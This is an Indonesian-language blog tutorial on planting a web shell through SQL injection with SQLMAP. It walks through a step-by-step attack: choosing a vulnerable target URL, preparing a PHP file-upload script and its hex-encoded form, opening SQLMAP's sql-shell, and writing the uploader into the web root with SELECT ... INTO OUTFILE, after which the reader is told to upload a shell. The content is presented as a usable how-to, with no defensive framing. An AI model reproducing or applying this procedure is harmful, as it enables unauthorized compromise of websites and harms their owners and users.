Selamat pagi sobat blogger, ketemu lagi bersama admin sharexid. Kali ini admin ingin berbagi satu ilmu newbie hasil dari blogwalking sana sini, yaitu Cara Upload Shell dengan SQLMAP. Tentunya sobat sekalian udah pada tau dong sama tools yang namanya SQLMAP, nih tools ajib banget buat sqli buat newbie seperti admin kayak gini hehee.
1. Pertama kita harus punya target dulu tentunya. Ini contoh target admin.
http://dewa-maho.com/tusuk.php?id=5
2. Yang kedua kita siapin script uploadnya. Disini sebagai contoh admin mau upload script ini.
PHP Code:
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>Tapi sebelumnya convert dulu script diatas menjadi hex. Hasilnya jadi kyak gini.
PHP Code:
3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d697422
2076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f616465
6466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e 3. Open terminal setelah itu open SQLMAP nya. Kalau belum punya SQLMAP download disini.
4. Setelah itu kira2 keluar kode kayak ini,
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
5. Sekarang ketik SELECT 0x'Hex' INTO OUTFILE "PATH/namaFile";
Jangan lupa menambahkan '0x' di depan
'HEX'0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974 222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164 656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
into "/home/relax/public_html/upload.php";
6. Tunggu kalau berhasil akan ada pemberitahuan berhasil di upload, kalau belum ya di coba lagi. Setelah berhasil silahkan browse file kita tadi, http://dewa-maho.com/upload.php dan tinggal upload shellnya deh.
sumber : http://devilzc0de.org
http://notlurking.com
http://sh.st/qg2lG
Sekian tutorial Cara Upload Shell dengan SQLMAP. Semoga membantu dan semoga bermanfaat :) Happy Blogwalking
Okee gan sama sama.
BalasHapus